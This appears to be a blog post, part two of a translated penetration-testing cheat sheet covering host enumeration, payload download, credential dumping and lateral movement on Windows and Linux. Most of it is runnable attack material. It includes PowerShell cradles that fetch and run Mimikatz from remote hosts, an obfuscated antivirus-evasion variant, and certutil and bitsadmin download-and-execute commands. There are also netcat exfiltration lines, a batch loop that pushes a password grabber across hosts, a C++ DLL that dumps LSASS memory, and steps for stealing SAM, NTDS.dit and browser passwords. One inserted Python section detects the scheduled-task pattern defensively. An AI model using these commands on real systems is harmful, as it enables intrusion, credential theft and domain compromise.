Penetration testing routine operations log (part 2)

Posted by 全球精酿视野 on 2020-10-8 22:00:20

Linux

OS, kernel version and environment variables
>cat /etc/issue
>cat /etc/*-release
>cat /etc/lsb-release
>cat /etc/redhat-release
>cat /proc/version
>uname -a
>uname -mrs
>rpm -q kernel
>dmesg | grep Linux
>ls /boot | grep vmlinuz-
>cat /etc/profile
>cat /etc/bashrc
>cat ~/.bash_profile
>cat ~/.bashrc
>cat ~/.bash_logout
>env
>set

Processes running as root
>ps aux | grep root
>ps -ef | grep root

Scheduled tasks
>crontab -l
>ls -alh /var/spool/cron
>ls -al /etc/ | grep cron
>ls -al /etc/cron*
>cat /etc/cron*
>cat /etc/at.allow
>cat /etc/at.deny
>cat /etc/cron.allow
>cat /etc/cron.deny
>cat /etc/crontab
>cat /etc/anacrontab
>cat /var/spool/cron/crontabs/root

IP information
>/sbin/ifconfig -a
>cat /etc/network/interfaces
>cat /etc/sysconfig/network

Connection information
>grep 80 /etc/services
>netstat -antup
>netstat -antpx
>netstat -tulpn
>chkconfig --list
>chkconfig --list | grep 3:on
>last
>w

User information
>id
>whoami
>w
>last
>cat /etc/passwd
>cat /etc/group
>cat /etc/shadow
>ls -alh /var/mail/
>grep -v -E "^#" /etc/passwd | awk -F: '$3 == 0 { print $1}'   # list superusers
>awk -F: '($3 == "0") {print}' /etc/passwd   # list superusers
>cat /etc/sudoers
>sudo -l

Command history
>cat ~/.bash_history
>cat ~/.nano_history
>cat ~/.atftp_history
>cat ~/.mysql_history
>cat ~/.php_history

Writable directories
>find / -writable -type d 2>/dev/null      # writable directories
>find / -perm -222 -type d 2>/dev/null     # world-writable directories
>find / -perm -o=w -type d 2>/dev/null     # world-writable directories
>find / -perm -o=x -type d 2>/dev/null     # world-executable directories
>find / \( -perm -o=w -perm -o=x \) -type d 2>/dev/null   # world-writable and executable directories
HTTP server
>python2 -m SimpleHTTPServer
>python3 -m http.server 8080
>php -S 0.0.0.0:8888
>openssl req -x509 -newkey rsa:2048 -keyout key.pem -out cert.pem -days 365 -nodes
>openssl s_server -key key.pem -cert cert.pem -accept 443 -WWW
>ruby -rwebrick -e "WEBrick::HTTPServer.new(:Port => 8888,:DocumentRoot => Dir.pwd).start"
>ruby -run -e httpd . -p 8888
File operations

Finding files on Windows

>cd /d E: && dir /b /s index.php
>for /r E:\ %i in (index*.php) do @echo %i
>powershell Get-ChildItem d:\ -Include index.php -recurse

Finding files on Linux

#find / -name index.php
Finding webshell files
>find . -name '*.php' | xargs grep -n 'eval('
>find . -name '*.php' | xargs grep -n 'assert('
>find . -name '*.php' | xargs grep -n 'system('

Create

Read a text file:
>$file = Get-Content "1.txt"
>$file
>powershell Set-content "1.txt" "wocao"
&
>powershell "write-output ([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String(\"d2Vic2hlbGw=\"))) | out-file -filepath c:\www\wwwroot\1.aspx;"



Compress
>rar.exe a -k -r -s -m3 C:\1.rar C:\wwwroot
>7z.exe a -r -p12345 C:\1.7z C:\wwwroot


Extract

>rar.exe e c:\wwwroot\1.rar
>7z.exe x -p12345 C:\1.7z -oC:\wwwroot


Transfer

FTP

>open 192.168.0.98 21
>(enter username and password)
>dir    (list files)
>get file.txt



VBS

#1.vbs
Set Post = CreateObject("Msxml2.XMLHTTP")
Set Shell = CreateObject("Wscript.Shell")
Post.Open "GET","http://192.168.1.192/Client.exe",0
Post.Send()
Set aGet = CreateObject("ADODB.Stream")
aGet.Mode = 3
aGet.Type = 1
aGet.Open()
aGet.Write(Post.responseBody)
aGet.SaveToFile "C:\1.exe",2
>cscript 1.vbs

A second variant:
Const adTypeBinary = 1
Const adSaveCreateOverWrite = 2
Dim http,ado
Set http = CreateObject("Msxml2.serverXMLHTTP")
http.SetOption 2,13056    ' ignore HTTPS errors
http.open "GET","http://192.168.1.192/Client.exe",False
http.send
Set ado = createobject("Adodb.Stream")
ado.Type = adTypeBinary
ado.Open
ado.Write http.responseBody
ado.SaveToFile "c:\1.exe",adSaveCreateOverWrite
ado.Close



JS
var WinHttpReq = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
WinHttpReq.Open("GET", WScript.Arguments(0), /*async=*/false);
WinHttpReq.Send();
BinStream = new ActiveXObject("ADODB.Stream");
BinStream.Type = 1;
BinStream.Open();
BinStream.Write(WinHttpReq.ResponseBody);
BinStream.SaveToFile("1.exe");
>cscript /nologo 1.js http://192.168.1.192/Client.exe



Bitsadmin

>bitsadmin /transfer n http://192.168.1.192/Client.exe  e:\1.exe
>bitsadmin /rawreturn /transfer getfile http://192.168.1.192/Client.exe e:\1.exe
>bitsadmin /rawreturn /transfer getpayload http://192.168.1.192/Client.exe e:\1.exe
>bitsadmin /transfer myDownLoadJob /download /priority normal "http://192.168.1.192/Client.exe" "e:\1.exe"


Powershell
1
Note: may not work on kernel versions below 5.2
>powershell (new-object System.Net.WebClient).DownloadFile('http://192.168.1.1/Client.exe','C:\1.exe'); start-process 'c:\1.exe'
>powershell
>(New-Object System.Net.WebClient).DownloadFile('http://192.168.0.108/1.exe',"$env:APPDATA\csrsv.exe");Start-Process("$env:APPDATA\csrsv.exe")

2
PS>Copy-Item '\\sub2k8.zone.com\c$\windows\1.txt' -Destination '\\dc.zone.com\c$\1.txt'

3
>powershell ($dpl=$env:temp+'\f.exe');(New-Object System.Net.WebClient).DownloadFile('http://192.168.0.108/ok.txt',$dpl);

4
Newer versions
PS>iwr -Uri http://192.168.0.106:1222/111.txt -OutFile 123.txt -UseBasicParsing

5
C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Templates>Import-Module BitsTransfer
>$path = [environment]::getfolderpath("temp")
>Start-BitsTransfer -Source "http://192.168.0.108/ok.txt" -Destination "$path\ok.txt"
>Invoke-Item "$path\ok.txt"


Certutil
>certutil.exe -urlcache -split -f http://192.168.1.192/Client.exe
>certutil.exe -urlcache -split -f http://192.168.1.192/Client.exe delete
Encode the file, download it, then decode and execute it
>base64 payload.exe > /var/www/html/1.txt    # generate the base64-encoded exe on the C&C server
>certutil -urlcache -split -f http://192.168.0.107/1.txt & certutil -decode 1.txt ms.exe & ms.exe


Python
#python -c 'import urllib;urllib.urlretrieve("http://192.168.1.192/Client.exe","/path/to/save/1.exe")'


Perl

#!/usr/bin/perl
use LWP::Simple;
getstore("http://192.168.1.192/Client.exe", "1.exe");

PHP

#!/usr/bin/php
<?php
// file_get_contents() returns the whole body; file() would split it into lines
$data = @file_get_contents("http://192.168.1.192/Client.exe");
$lf = "1.exe";
$fh = fopen($lf, 'w');
fwrite($fh, $data);
fclose($fh);
?>
Curl
#curl -o 1.exe http://192.168.1.192/Client.exe


wget

#wget http://192.168.1.192/Client.exe
#wget -b    (download in the background)
#wget -c    (resume an interrupted download)


nc
Receiving side
>nc -lvnp 333 >1.txt
Target
>nc -vn 192.168.1.2 333 <test.txt -q 1
&
>cat 1.txt >/dev/tcp/1.1.1.1/333


SCP

Transferring a file from Linux
>scp -P 22 file.txt user@1.1.1.1:/tmp


Hashes & passwords

Cracking sites

https://www.objectif-securite.ch/en/ophcrack
http://cracker.offensive-security.com/index.php

Cracking hashes with Google Colab
I had seen an article about this on freebuf before, and recently came across the script on github, so I gave it a try; the speed is respectable.
https://www.freebuf.com/geek/195453.html
https://gist.github.com/chvancooten/59acfbf1d8ee7a865108fca2e9d04c4a
Open https://drive.google.com/drive, create a new folder, right-click it, choose More and then Google Colab.

If it is not listed, click "Connect more apps", search for that name and install it.

Install hashcat and download a wordlist.

Choose GPU acceleration as the runtime type.

Testing a simple password here.

1.2 billion passwords took a little over 20 minutes.
https://download.weakpass.com/wordlists/1851/hashesorg2019.gz
The above is the wordlist.

Password policy

By default, the machine account password is changed every 30 days.
>HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Netlogon\Parameters, value DisablePasswordChange: setting it to 1 disables changing the account password
>In Group Policy (gpedit.msc) the default 30 days can be changed at "Computer Configuration\Windows Settings\Security Settings\Local Policies\Security Options\Domain member: Maximum machine account password age"; a value of 0 means unlimited
>Disabling machine account password changes exists to support VDI (virtual desktops) and similar scenarios; the setting is at "Computer Configuration\Windows Settings\Security Settings\Local Policies\Security Options\Domain member: Disable machine account password changes"

Debug Privilege
Local Security Policy > Local Policies > User Rights Assignment > Debug programs

Enabling WDigest

Cmd
>reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
powershell
>Set-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest -Name UseLogonCredential -Type DWORD -Value 1
meterpreter
>reg setval -k HKLM\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest -v UseLogonCredential -t REG_DWORD -d 1

Getpass
>getpassword.exe>1.txt

QuarksPwDump
>QuarksPwDump.exe -dump-hash-local

MSF
Meterpreter > run hashdump
&
Meterpreter > mimikatz_command -f samdump::hashes
&
Meterpreter > load mimikatz
Meterpreter > wdigest
&
Meterpreter > load mimikatz
Meterpreter > msv
Meterpreter > kerberos
&
Meterpreter > load kiwi
Meterpreter > creds_all
&
Meterpreter > migrate PID
Meterpreter > load mimikatz
Meterpreter > mimikatz_command -f sekurlsa::searchPasswords
&
Meterpreter > run windows/gather/smart_hashdump

Empire
>usemodule credentials/mimikatz/dcsync_hashdump

Invoke-Dcsync
>powershell -nop -ep bypass "IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.107/ps/Invoke-DCSync.ps1');invoke-dcsync"


Mimikatz

Calling mimikatz remotely

Grab plaintext
>powershell IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.108/nishang/Gather/Invoke-Mimikatz.ps1'); Invoke-Mimikatz
Grab hashes
>powershell IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.100/nishang/Gather/Get-PassHashes.ps1');Get-PassHashes
>powershell -w hidden -ep bypass "IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.107/ps/powersploit/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz" >C:\Users\Administrator.DC\Desktop\1123.txt

Batch hash grabbing across hosts
Schtasks
Put the IP list in ip.txt. For each IP, net use with one set of credentials; if the connection succeeds, copy getpass to the temp directory, then use the same credentials to remotely create a scheduled task named windowsupdate that runs getpass daily at 00:00 as SYSTEM. After creation the task is run at once (the schtasks /run call) and then deleted. ping -n 10 >nul is a pause of roughly 10 seconds; after it the result file is copied back locally, getpass is deleted and the connection is removed.
>for /f %i in (ip.txt) do net use \\%i\admin$ /user:"administrator" "password" & if %errorlevel% equ 0 ( copy getpass.exe \\%i\admin$\temp\ /Y ) & schtasks /create /s "%i" /u "administrator" /p "password" /RL HIGHEST /F /tn "windowsupdate" /tr "c:\windows\temp\getpass.exe" /sc DAILY /mo 1 /ST 00:00 /RU SYSTEM & schtasks /run /tn windowsupdate /s "%i" /U "administrator" /P "password" & schtasks /delete /F /tn windowsupdate /s "%i" /U "administrator" /P "password" & @ping 127.0.0.1 -n 10 >nul & move \\%i\admin$\temp\dumps.logs C:\Users\Public\%i.logs & del \\%i\admin$\temp\getpass.exe /F & net use \\%i\admin$ /del
Wmic
>for /f %i in (ip.txt) do net use \\%i\admin$ /user:"administrator" "password" & if %errorlevel% equ 0 ( copy getpass.exe \\%i\admin$\temp\ /Y ) & wmic /NODE:"%i" /user:"administrator" /password:"password" PROCESS call create "c:\windows\temp\getpass.exe" & @ping 127.0.0.1 -n 10 >nul & move \\%i\admin$\temp\dumps.logs C:\Users\Public\%i.logs & del \\%i\admin$\temp\getpass.exe /F & net use \\%i\admin$ /del
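Seen from the defender's side, the create/run/delete sequence above leaves a recognisable trace in the Windows security log. The following Python is an added example (not from the original post) that flags a scheduled task created and deleted within minutes on a host that had just received a network logon; the event records are constructed samples in a simplified shape, not real exported logs.

```python
"""Flag the create-run-delete scheduled-task pattern in Windows security events.

Added example, not part of the original post. Event IDs used: 4624 (logon,
type 3 = network), 4698 (scheduled task created), 4699 (scheduled task
deleted). The records below are constructed samples in a simplified shape,
not real exported logs.
"""
from datetime import datetime, timedelta

# Constructed sample events (simplified field names, not a real log export).
SAMPLE_EVENTS = [
    {"time": "2020-10-08T22:00:01", "id": 4624, "host": "WS01",
     "user": "administrator", "logon_type": 3, "src_ip": "192.168.0.107"},
    {"time": "2020-10-08T22:00:03", "id": 4698, "host": "WS01",
     "user": "administrator", "task": "\\windowsupdate",
     "command": "c:\\windows\\temp\\getpass.exe", "run_as": "SYSTEM"},
    {"time": "2020-10-08T22:00:04", "id": 4699, "host": "WS01",
     "user": "administrator", "task": "\\windowsupdate"},
    # A long-lived maintenance task on another host: created in the morning,
    # removed in the evening, no preceding network logon. Must not be flagged.
    {"time": "2020-10-08T09:00:00", "id": 4698, "host": "WS02",
     "user": "svc_backup", "task": "\\Backup\\Nightly",
     "command": "C:\\Backup\\run.cmd", "run_as": "svc_backup"},
    {"time": "2020-10-08T18:00:00", "id": 4699, "host": "WS02",
     "user": "svc_backup", "task": "\\Backup\\Nightly"},
]


def _ts(event):
    return datetime.fromisoformat(event["time"])


def find_transient_tasks(events, max_lifetime=timedelta(minutes=5),
                         logon_lookback=timedelta(minutes=10)):
    """Return one finding per task that lived at most max_lifetime.

    Tasks are matched by (host, task name). If a network logon (4624, type 3)
    hit the same host within logon_lookback before the task was created, its
    source address is attached so the finding can be traced back to the
    machine that drove the action.
    """
    ordered = sorted(events, key=_ts)
    network_logons = [e for e in ordered
                      if e["id"] == 4624 and e.get("logon_type") == 3]
    pending = {}   # (host, task) -> creation event still awaiting deletion
    findings = []
    for event in ordered:
        key = (event["host"], event.get("task"))
        if event["id"] == 4698:
            pending[key] = event
        elif event["id"] == 4699:
            created = pending.pop(key, None)
            if created is None:
                continue
            lifetime = _ts(event) - _ts(created)
            if lifetime > max_lifetime:
                continue
            # Most recent network logon to this host before the task was created.
            src_ip = None
            for logon in network_logons:
                gap = _ts(created) - _ts(logon)
                if logon["host"] == event["host"] and timedelta(0) <= gap <= logon_lookback:
                    src_ip = logon["src_ip"]
            findings.append({
                "host": event["host"],
                "task": event["task"],
                "command": created.get("command", ""),
                "run_as": created.get("run_as", ""),
                "lifetime_seconds": int(lifetime.total_seconds()),
                "remote_src": src_ip,
            })
    return findings


if __name__ == "__main__":
    for finding in find_transient_tasks(SAMPLE_EVENTS):
        print(finding)
```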
Direct use
>mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords full" exit >> log.txt
>privilege::debug
>misc::memssp
Lock the screen
>rundll32.exe user32.dll,LockWorkStation
The captured results are written to c:\windows\system32\mimilsa.log
>mimikatz log "privilege::debug" "lsadump::lsa /patch"
>mimikatz !privilege::debug
>mimikatz !token::elevate
>mimikatz !lsadump::sam

Powershell Bypass

>powershell -c " ('IEX '+'(Ne'+'w-O'+'bject Ne'+'t.W'+'ebClien'+'t).Do'+'wnloadS'+'trin'+'g'+'('+'1vchttp://'+'192.168.0'+'.101/'+'Inv'+'oke-Mimik'+'a'+'tz.'+'ps11v'+'c)'+';'+'I'+'nvoke-Mimika'+'tz').REplaCE('1vc',[STRing][CHAR]39)|IeX"
.net 2.0
Place katz.cs in C:\Windows\Microsoft.NET\Framework\v2.0.50727
Run in PowerShell
>$key = 'BwIAAAAkAABSU0EyAAQAAAEAAQBhXtvkSeH85E31z64cAX+X2PWGc6DHP9VaoD13CljtYau9SesUzKVLJdHphY5ppg5clHIGaL7nZbp6qukLH0lLEq/vW979GWzVAgSZaGVCFpuk6p1y69cSr3STlzljJrY76JIjeS4+RhbdWHp99y8QhwRllOC0qu/WxZaffHS2te/PKzIiTuFfcP46qxQoLR8s3QZhAJBnn9TGJkbix8MTgEt7hD1DC2hXv7dKaC531ZWqGXB54OnuvFbD5P2t+vyvZuHNmAy3pX0BDXqwEfoZZ+hiIk1YUDSNOE79zwnpVP1+BN0PK5QCPCS+6zujfRlQpJ+nfHLLicweJ9uT7OG3g/P+JpXGN0/+Hitolufo7Ucjh+WvZAU//dzrGny5stQtTmLxdhZbOsNDJpsqnzwEUfL5+o8OhujBHDm/ZQ0361mVsSVWrmgDPKHGGRx+7FbdgpBEq3m15/4zzg343V9NBwt1+qZU+TSVPU0wRvkWiZRerjmDdehJIboWsx4V8aiWx8FPPngEmNz89tBAQ8zbIrJFfmtYnj1fFmkNu3lglOefcacyYEHPX/tqcBuBIg/cpcDHps/6SGCCciX3tufnEeDMAQjmLku8X4zHcgJx6FpVK7qeEuvyV0OGKvNor9b/WKQHIHjkzG+z6nWHMoMYV5VMTZ0jLM5aZQ6ypwmFZaNmtL6KDzKv8L1YN2TkKjXEoWulXNliBpelsSJyuICplrCTPGGSxPGihT3rpZ9tbLZUefrFnLNiHfVjNi53Yg4='
>$Content = [System.Convert]::FromBase64String($key)
>Set-Content key.snk -Value $Content -Encoding Byte
Run in cmd
>C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe /r:System.EnterpriseServices.dll /out:katz.exe /keyfile:key.snk /unsafe katz.cs
>C:\Windows\Microsoft.NET\Framework\v2.0.50727\regsvcs.exe katz.exe
.net 4.0 Msbuild
>C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild mimi.xml


JScript

>wmic os get /format:"mimikatz.xsl"

>wmic os get /format:"http://192.168.0.107/ps/mimi.xsl"
Procdump64+mimikatz
>procdump64.exe -accepteula -64 -ma lsass.exe lsass.dmp
>procdump.exe -accepteula -ma lsass.exe lsass.dmp
>mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" exit
>powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/TheKingOfDuck/hashdump/master/procdump/procdump.ps1');Invoke-Procdump64 -Args '-accepteula -ma lsass.exe lsass.dmp'"
Dumpert
https://github.com/outflanknl/Dumpert
There are three variants: a DLL, an executable and a CS Aggressor plugin; the DLL and the exe are tested here.
The DLL is run with: rundll32.exe C:\Outflank-Dumpert.dll,Dump

The dump is saved to c:\windows\temp\dumpert.dmp; then with mimikatz
>sekurlsa::minidump c:\windows\temp\dumpert.dmp
>sekurlsa::logonpasswords

The executable can simply be run directly.

Bypassing Kaspersky

https://gist.github.com/xpn/c7f6d15bf15750eae3ec349e7ec2380e

Download the three files locally and compile them with Visual Studio; a few changes are needed. (1) Add #pragma comment(lib, "Rpcrt4.lib") to link the Rpcrt4.lib library. (2) Rename the .c file to .cpp, since it uses C++ code. (3) Build for x64 to obtain the exe.
In Visual Studio create an empty C++ project with configuration type DLL, character set Unicode and the 64-bit debugger. The DLL writes its output to C:\\windows\\temp\\1.bin.

#include <cstdio>
#include <windows.h>
#include <DbgHelp.h>
#include <iostream>
#include <string>
#include <map>
#include <TlHelp32.h>
#pragma comment(lib,"Dbghelp.lib")
using namespace std;

// Walk a process snapshot and return the PID of lsass.exe, or -1 if not found
int FindPID() {
    PROCESSENTRY32 pe32;
    pe32.dwSize = sizeof(pe32);
    HANDLE hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    if (hProcessSnap == INVALID_HANDLE_VALUE) {
        cout << "CreateToolhelp32Snapshot Error!" << endl;
        return -1;
    }
    int pid = -1;
    BOOL bResult = Process32First(hProcessSnap, &pe32);
    while (bResult) {
        if (_wcsicmp(pe32.szExeFile, L"lsass.exe") == 0) {
            pid = pe32.th32ProcessID;
            break;
        }
        bResult = Process32Next(hProcessSnap, &pe32);
    }
    CloseHandle(hProcessSnap);   // release the snapshot on every path
    return pid;
}

typedef HRESULT(WINAPI* _MiniDumpW)(DWORD arg1, DWORD arg2, PWCHAR cmdline);
typedef NTSTATUS(WINAPI* _RtlAdjustPrivilege)(ULONG Privilege, BOOL Enable, BOOL CurrentThread, PULONG Enabled);

int dump() {
    _MiniDumpW MiniDumpW;
    _RtlAdjustPrivilege RtlAdjustPrivilege;
    ULONG t;
    // MiniDumpW exported by comsvcs.dll takes "<pid> <path> full" as one string
    MiniDumpW = (_MiniDumpW)GetProcAddress(LoadLibrary(L"comsvcs.dll"), "MiniDumpW");
    RtlAdjustPrivilege = (_RtlAdjustPrivilege)GetProcAddress(GetModuleHandle(L"ntdll"), "RtlAdjustPrivilege");
    if (MiniDumpW == NULL) {
        return 0;
    }
    // try to enable the debug privilege (SeDebugPrivilege = 20)
    RtlAdjustPrivilege(20, TRUE, FALSE, &t);
    wchar_t ws[100];
    swprintf(ws, 100, L"%d%hs", FindPID(), " C:\\windows\\temp\\1.bin full");
    MiniDumpW(0, 0, ws);
    return 0;
}

BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) {
    switch (ul_reason_for_call) {
    case DLL_PROCESS_ATTACH:
        dump();
        break;
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}

>xxx.exe c:\xx\xx\xx.dll    (use an absolute path)

Remote LSASS process dump - Physmem2profit

https://github.com/FSecureLABS/physmem2profit
mimikatz is what most security people use to obtain credentials, but current AV/EDR identifies and kills it easily, so here mimikatz is not used on the server side; the lsass process is dumped remotely instead. On the server side, build physmem2profit-public\server\ directly with Visual Studio.

Client
>git clone --recurse-submodules https://github.com/FSecureLABS/physmem2profit.git
On the client, install first
>bash physmem2profit/client/install.sh

The file https://github.com/Velocidex/c-aff4/raw/master/tools/pmem/resources/winpmem/att_winpmem_64.sys has to be uploaded to the target server; here it is placed in c:\windows\temp\.
Run on the server side
>Physmem2profit.exe --ip 192.168.0.98 --port 8888 --verbose
The IP here is the server's own IP.

Install the required modules on the attacking machine

Run on the attacking machine
>source physmem2profit/client/.env/bin/activate
>cd physmem2profit/client
>python3 physmem2profit --mode all --host 192.168.0.98 --port 8888 --drive winpmem --install 'c:\windows\temp\att_winpmem_64.sys' --label test

The server side shows the incoming connection.

Move the generated dmp file to a Windows system and use mimikatz to obtain the hashes; pypykatz can also be used on Linux.

One more command for dumping the lsass process; it must be run as SYSTEM
>rundll32.exe C:\Windows\System32\comsvcs.dll MiniDump <lsass pid> lsass.dmp full


SqlDumper+mimikatz

Location: C:\Program Files\Microsoft SQL Server\number\Shared
>tasklist /svc | findstr lsass.exe    (find the PID of lsass.exe)
>Sqldumper.exe <lsass PID> 0 0x01100    (write the mdmp file)
>mimikatz.exe "sekurlsa::minidump SQLDmpr0001.mdmp" "sekurlsa::logonPasswords full" exit
Mimipenguin
Grabs hashes on Linux; requires root
https://github.com/huntergregal/mimipenguin


Cached hash extraction

Registry

>reg save hklm\sam c:\sam.hive & reg save hklm\system c:\system.hive & reg save hklm\security c:\security.hive
>mimikatz.exe "lsadump::sam /system:system.hive /sam:sam.hive" exit

Ninjacopy

#http://192.168.0.101/powersploit/Exfiltration/Invoke-NinjaCopy.ps1
>powershell -exec bypass
>Import-Module .\invoke-ninjacopy.ps1
>Invoke-NinjaCopy -Path C:\Windows\System32\config\SAM -LocalDestination .\sam.hive
>Invoke-NinjaCopy -Path C:\Windows\System32\config\SYSTEM -LocalDestination .\system.hive
>Invoke-NinjaCopy -Path "c:\windows\ntds\ntds.dit" -LocalDestination "C:\Windows\Temp\1.dit"
>Invoke-NinjaCopy -Path "c:\windows\ntds\ntds.dit" -ComputerName "dc.zone.com" -LocalDestination "C:\Windows\Temp\1.dit"

Quarks-pwdump

>quarks-pwdump.exe -dump-hash-domain

Domain hash extraction

Ntdsutil

>ntdsutil
>snapshot
>activate instance ntds
>create
>mount {guid}
>copy <mount point>\windows\NTDS\ntds.dit d:\ntds_save.dit
>unmount {guid}
>delete {guid}
>quit
&
Create
> ntdsutil snapshot "activate instance ntds" create quit quit
Mount
> ntdsutil snapshot "mount {guid}" quit quit
Copy
>copy c:\$SNAP_XXX_VOLUMEC$\windows\NTDS\ntds.dit d:\ntds_save.dit
Unmount and delete
> ntdsutil snapshot "unmount {guid}" "delete {guid}" quit quit
Check after deletion
> ntdsutil snapshot "List All" quit quit
Extract the hashes
> QuarksPwDump -dump-hash-domain -ntds-file d:\ntds_save.dit

Vssadmin

Create a shadow copy of the C: volume
>vssadmin create shadow /for=c:
Copy ntds.dit
>copy {Shadow Copy Volume Name}\windows\NTDS\ntds.dit c:\ntds.dit
Delete the shadow copy
>vssadmin delete shadows /for=c: /quiet

Impacket
secretsdump.py from Impacket
#impacket-secretsdump -system SYSTEM -ntds ntds.dit LOCAL
#impacket-secretsdump -hashes xxx:xxx -just-dc xxx.com/admin\@192.168.1.1

NTDSDumpex

>Invoke-NinjaCopy -Path "c:\windows\ntds\ntds.dit" -LocalDestination "C:\Windows\Temp\1.dit"
>reg save HKLM\SYSTEM C:\Windows\Temp\SYSTEM.hive
https://github.com/zcgonvh/NTDSDumpEx
>NTDSDumpEx.exe -d ntds.dit -s SYSTEM.hive

Calling Vssadmin through WMI

>wmic /node:dc /user:xxxx\admin /password:passwd process call create "cmd /c vssadmin create shadow /for=C: 2>&1"
>wmic /node:dc /user:xxxx\admin /password:passwd process call create "cmd /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\temp\ntds.dit 2>&1"
>wmic /node:dc /user:xxxx\admin /password:passwd process call create "cmd /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\temp\SYSTEM.hive 2>&1"
>copy \\10.0.0.1\c$\temp\ntds.dit C:\temp
PS C:\Users\test.PENTESTLAB> copy \\10.0.0.1\c$\temp\SYSTEM.hive C:\temp

PowerSploit

PS >Import-Module .\VolumeShadowCopyTools.ps1
PS >New-VolumeShadowCopy -Volume C:\
PS >Get-VolumeShadowCopy

Nishang

PS >Import-Module .\Copy-VSS.ps1
PS >Copy-VSS
PS >Copy-VSS -DestinationDir C:\ShadowCopy\
or from MSF
Meterpreter>load powershell
Meterpreter>powershell_import /root/Copy-VSS.ps1
Meterpreter>powershell_execute Copy-VSS

Mimikatz

#lsadump::dcsync /domain:xxx.com /all /csv
#privilege::debug
#lsadump::lsa /inject

MSF

#use auxiliary/admin/smb/psexec_ntdsgrab
#set rhost smbdomain smbuser smbpass
#exploit
The ntds.dit file is stored under /root/.msf4/loot
Post-exploitation module
#use windows/gather/credentials/domain_hashdump
#set session 1

laZagne

windows

https://github.com/AlessandroZ/LaZagne
>laZagne.exe all -oN    (collect all passwords and write them to a file)
Powershell
PS>[Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime]
PS>$vault = New-Object Windows.Security.Credentials.PasswordVault
PS>$vault.RetrieveAll() | % { $_.RetrievePassword();$_ }

Linux

>python3 laZagne.py all

Sensitive information

Seatbelt

Compile with Visual Studio
>Seatbelt.exe ALL    (collect everything)

VNC passwords

>reg query HKEY_LOCAL_MACHINE\SOFTWARE\TightVNC\Server /v password
http://www.cqure.net/wp/tools/password-recovery/vncpwdump/

Decrypt

>vncpwdump.exe -k hash

Navicat information

>reg query HKEY_CURRENT_USER\SOFTWARE\PremiumSoft\Navicat\Servers /s /v host
>reg query HKEY_CURRENT_USER\SOFTWARE\PremiumSoft\Navicat\Servers /s /v UserName
>reg query HKEY_CURRENT_USER\SOFTWARE\PremiumSoft\Navicat\Servers /s /v pwd
Offline decryption: https://github.com/HyperSine/how-does-navicat-encrypt-password

Passwords saved in Chrome

>mimikatz dpapi::chrome /in:"%localappdata%\Google\Chrome\User Data\Default\Login Data" /unprotect

Foxmail

X:\Foxmail\storage\xxx\Accounts\Account.rec0
Decrypt with Foxmail Password Decryptor: https://securityxploded.com/foxmail-password-decryptor.php

Passwords saved in Firefox

https://www.nirsoft.net/password_recovery_tools.html
>webbrowserpassview.exe /LoadPasswordsFirefox 1 /shtml "c:\1.html"
>dir %appdata%\Mozilla\Firefox\Profiles\
>dir %appdata%\Mozilla\Firefox\Profiles\yn80ouvt.default
The firefox.exe process has to be terminated first. Compress the profile:
>7z.exe -r -padmin123 a c:\users\public\firefox.7z C:\Users\Administrator\AppData\Roaming\Mozilla\*.*
https://github.com/unode/firefox_decrypt
https://securityxploded.com/firefox-master-password-cracker.php

SecureCRT
The config folder under C:\Documents and Settings\Administrator\Application Data\VanDyke
C:\program files\Vandyke software\securecrt\
https://github.com/uknowsec/SharpDecryptPwd

Lateral movement

Discovering live hosts

For + ping to find live hosts
>for /L %I in (1,1,254) DO @ping -w 1 -n 1 192.168.0.%I |findstr "TTL="

For + ping to resolve domain names to IPs

>for /f "delims=" %i in (D:/domains.txt) do @ping -w 1 -n 1 %i | findstr /c:"[192." >> c:/windows/temp/ds.txt

NbtScan

Windows
>nbtscan.exe -m 192.168.1.0/24
Linux
#nbtscan -r 192.168.0.0/24

NMAP

#nmap -Pn -open -A -n -v -iL filename.txt
-Pn: skip host discovery
-n: no DNS resolution
-open: show only open ports
-A: during the scan, pressing Enter shows the scan progress
-v: verbose output
-F: fast scan of the 100 most common ports
-p: ports to scan, e.g. -p1-65535 (all ports, no spaces in between)
-iL: read the list of IPs to scan from a file
-sV: probe open ports for service and version information
-T: timing template, T3 by default; use -T4 for a faster scan
Live hosts
>nmap -sP -PI 192.168.0.0/24
>nmap -sn -PE -T4 192.168.0.0/24
>nmap -sn -PR 192.168.0.0/24

nmap scan through a proxy
meterpreter > background
msf > use auxiliary/server/socks4a
then configure proxychains.conf
#proxychains nmap -sT -sV -Pn -n -p22,80,135,139,445 --script=smb-vuln-ms08-067.nse <internal IP>

NetDiscover

#netdiscover -r 192.168.0.0/24 -i wlan0

arp-scan

kali
>arp-scan --interface=wlan0 --localnet
Windows
>arp-scan.exe -t 192.168.0.0/24

MSF

#use auxiliary/scanner/discovery/arp_sweep
#use auxiliary/scanner/discovery/udp_sweep
#use auxiliary/scanner/netbios/nbname
meterpreter>run post/windows/gather/arp_scanner RHOSTS=192.168.1.1/24
